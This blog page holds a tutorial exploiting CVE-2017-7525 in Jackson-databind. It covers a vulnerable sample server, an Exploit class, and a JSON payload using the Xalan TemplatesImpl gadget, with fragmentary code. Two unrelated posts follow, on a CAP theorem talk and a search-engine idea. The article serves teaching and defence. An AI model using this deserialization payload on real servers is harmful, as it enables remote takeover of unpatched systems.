Remotely execute Java code using JSON


How difficult is to exploit a vulnerability in a common Java library in order to remotely execute Java code on a remote server and successfully taking control over it? Not much, really. In this article, we will demonstrate how to do that using CVE- 2017-7525, a well-known vulnerability in jackson-databind, a widely used library to serialize and deserialize JSON, also part of the spring-boot stack.

The sample code.

As we all know, the task of serializing and deserializing JSON messages is a very common task, especially in modern microservices REST-based applications: almost every time an API is called, a JSON message is sent to the server, to be transformed in a Java object. Because of a stream of deserialization vulnerabilities in jackson-databind it’s now possible to write simple exploits in order to get access to unpatched servers when polymorphic type handling is enabled.

In order to clearly explain the concepts, we are introducing here a simple server that handles products with two REST APIs, one to get the list of the products and one to add a new product  (all the code is available on GitHub). Please note that this is just a sample: we just want to provide you with a simple and understandable piece of code, and by no means it can be classified (we hope!) as production code.

A sample of our Product class, it holds some  basic product information:

public class Product {

    private int id;
    private String name;
    private String description;
    private Object data; 

    protected Product() {


Our ProductDatabase class, just a glorified HashMap

public class ProductsDatabase {

  private Map<String, Product> products = new HashMap<>();
  private AtomicInteger idGenerator = new AtomicInteger(0);

  public ProductsDatabase() {
     add(new Product(0,"apple", "Real apple from Italy", randomData()));
     add(new Product(0,"orange", "Real orange from Italy", randomData()));
     add(new Product(0,"kiwi", "Real kiwi from Italy", randomData()));

  public Collection list() {
    return Collections.unmodifiableCollection(products.values());

  public Product add(Product newProduct) {
    Integer newId = idGenerator.incrementAndGet();
    Product product = newProduct.duplicate(newId);
    products.put(newId.toString(), product);
    return product;


Our simple server, written with SparkJava:

public class Main {
  private static ProductsDatabase products = new ProductsDatabase();
  private static ObjectMapper deserializer = new ObjectMapper().enableDefaultTyping();
  private static ObjectMapper serializer = new ObjectMapper();
  public static void main(String[] args) {


    // GET list all products
    get("/products", (request, response) -> {
      Collection res = products.list();
      return serializer.writeValueAsString(res);

    // POST add new product
    post("/products", (request, response) -> {
      Product received = deserializer.readValue(request.body(), Product.class);

You can add a product to the database with a simple curl call with a JSON body containing the new product data:

curl -i -X POST -d '{"name":"melon","description":"Real melon from Italy", "data":["java.util.HashMap",{"cost":2,"color":"yellow"}]}' http://localhost:8888/products

The exploit.

In order to exploit the vulnerability, we need to have a vector. On this occasion we decided to use Apache Xalan, a common XSLT library also included in the JDK (which, until version 8u45, is possible to use as the vector, in the same way Xalan is used here). Please note that there are a lot of other options available as attack vectors, but for the sake of simplicity, we will focus here on a very specific one.

We will use a particular class from Xalan which is capable to deserialize an encoded class file from an XML, and dynamically create an instance of such class: we will craft a JSON message that will contain the encoded class of our exploit class here:

public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {

  public Exploit() throws Exception {
    System.err.println("Your server has been compromised!");

  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

We just need to compile this source code in a .class file, encoded it in Base64 and prepare our evil JSON message:

  "name": "fakeapple",
  "description": "Fake fruit from UK",
  "data": ["org.apache.xalan.xsltc.trax.TemplatesImpl",
    "transletName": "oops!",
    "outputProperties": {}

After sending the message to the server as a normal “add product” request, the encoded class will be instantiated by the Xalan TemplatesImpl class in order for it to populate the value of the outputProperties field: as the constructor code is executed, the evil code is executed as well and the server compromised. Yes, you might have exceptions in the server, but it’s too late.


This is just an example of hundreds of exploits currently possible using public vulnerabilities on various open source libraries and for that reason, it’s extremely important that you add to your build pipeline a scanner capable to detect and block the build if such situation is detected. We would kindly invite you to use our simple command line client available at and avoid future nasty surprises. You do not want to be the next Equifax.

You can reach me at!

`Disclaimer: please note that all these information are publicly available on the internet. This is just a summary post from a cybersecurity practitioner and nothing else. The code provided is for research purposes only.
Creative Commons Licence
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

CAP Theorem@Codemotion 2016, Milan

I just come back from Codemotion Milan, and it was great! Apparently a lot of people liked my presentation, someone told me that they really understood, for the first time, the CAP theorem. Which is absolutely great!

Thanks for everybody who attended, you were a fantastic bunch and I feel absolutely grateful and privileged for being there!

I am looking forward to the next tech meeting or conference!

Ah, the code is on GitHub but please keep in mind that this is basically the result of a four days spike, so it’s not particularly good. But I promise I will refactor it 🙂

The recording (in Italian) is available on youtube thanks to Codemotion.


How to make Google Search irrelevant

This is a concept I thought about an year ago, and it never went past the inception phase. I still think it’s a good one and for that reason I want to share it so that it won’t get lost in time 🙂

Vision: “Replace Google search”

The final vision for this project is to replace Google search. At the moment there’s no way to create a better ranking algorithm than the one used by Google, so the only way to beat Google search is to make it irrelevant, like Netflix did to Blockbuster or like digital music did to CDs.

The aim of this project is to collect all the human knowledge in a single and shared database, with all the user contributing to it as at the same time they will contribute to augment their personal knowledge.

Why this will work

As a person I am always frustrated about the time I spend to find something on the internet, or even worse, when I am offline. Searching the internet might be fast, but even when the experience is okay, I have the tendency to forget things, and I repeat search I did in the past sometimes very frequently. What I would like to do is to maintain this knowledge somewhere, in a place where it’s always accessible and extremely easy to find. At the moment there’s no such tool around: Evernote or Pocket, two tools often cited regarding this idea, have a very less bold metaphor, it does not focus around social interaction, and has no ranking of his contents as it’s focused on a single person.

Strategy (overview)

The implementation strategy will happen in three phases:

Phase one:
Launch of an application suite to collect a person knowledge

    • always available, on every device, must work offline
    • a simple and clear metaphor to manage knowledge
    • a set of super simple mechanisms to import knowledge from existing sources (i.e. Quora, Wikipedia, IMDB, Stackoverflow, emails…)

Phase two
Introduce social capabilities

    • a social mechanism to share or include knowledge of other people
    • a ranking algorithm to qualify better content from better users

Phase three
Launch of a worldwide site to explore knowledge of mankind, replacing effectively all existing focused and unfocused sources

    • all existing human knowledge will be available, already catalogued and sorted by human beings, voluntarily
    • the ranking algorithm will allow the relevant and better contents to emerge spontaneously and naturally

Strategy (detailed)

A more detailed explanation of the three-phases strategy follows.

Phase one: application suite

An application that must be always available regardless of the fact that I am using a mobile phone or a desktop computer, or even a Kindle. I should be able to install an application / plugin that will allow me to push data into my knowledge base without hassle: a set of specific browser plugins are highly recommended. Also, it must work offline: my entire database (or the most relevant part of it at least) shall be always accessible, and I will be able to push new data in the database at any time, as it will be synced automatically as long as I am online again.

A simple and clear metaphor to manage knowledge has to be found, it has to support both the adding and the retrieval of information to/from the database. At the moment the most promising model is based on a graph of information, with tags associated to it, and maybe different clusters, but it will be very important to find an extremely simple,effective and attractive mechanism for the end user to store and retrieve his knowledge (if we had telepathy we should use that). The metaphor must support some form of classification of contents, such as pre-defined tagging, clerical, prototyping.

Because we are consolidating knowledge we need to provide, and specifically on the internet, a set of super simple tools to import knowledge from existing sources like Quora, Wikipedia, IMDB, Stackoverflow, and even personal emails. Ideally we should think about two different mechanics to collect an information: you can copy it, so that it’s merged into your database and you can change as much as you want, or link it. so that you can still see the whole information (as it’s constantly sync-ed from the remote side) but it’s in readonly mode. An advance merge mode can be thought for copied contents, as soon as it’s extremely simple.

Phase two: social capabilities

A strong social element must be added to the platform from the very start. The basic mechanism would allow me to declare some content “public” or “friendly” (to a set of friends or a circle), so that other people can pull my content in their database (also here, copy+merge or link). An integration with either Facebook or Google+ is mandatory, more integrations are highly advisable.

An important step that enables the transition to the phase 3 of the project is a very good ranking algorithm, so that we can qualify the better content and the better users, ideally the “experts in the fields”: for that reason the metaphor, as explained before, must enable the classification of the contents. Such ranking algorithm should be related to relevance and in general to the reputation of the users, the same way Quora or Stackoverflow for example rank their user and automatically decide which contents should be in principle more relevant to a question: how many user linked such content? or copied it? Or liked it? Explicit rating should also be allowed, but in general the more automation the better. Some sort of gaming ranking is of course necessary.

Phase three: the worldwide site

The final aim of this project is to create a “socialpedia” or a “knowledgepedia”, so a form of global knowledge encyclopedia managed by all the users. The main difference between the most obvious antagonist, Wikipedia, is the way contents will emerge: we will not be collecting and classifying information, the users will do it, as they want to organize their knowledge. In the process of doing that, they will do organize a global knowledge that can then be used to the purpose of rendering any other search useless or redundant. The ranking algorithm will guarantee us the the best content will surface in such database, and it will be invaluable because of the fact that actual human beings, not machines or algorithms, will classify it.

At that time, you will hold the world knowledge. Like Google now, but better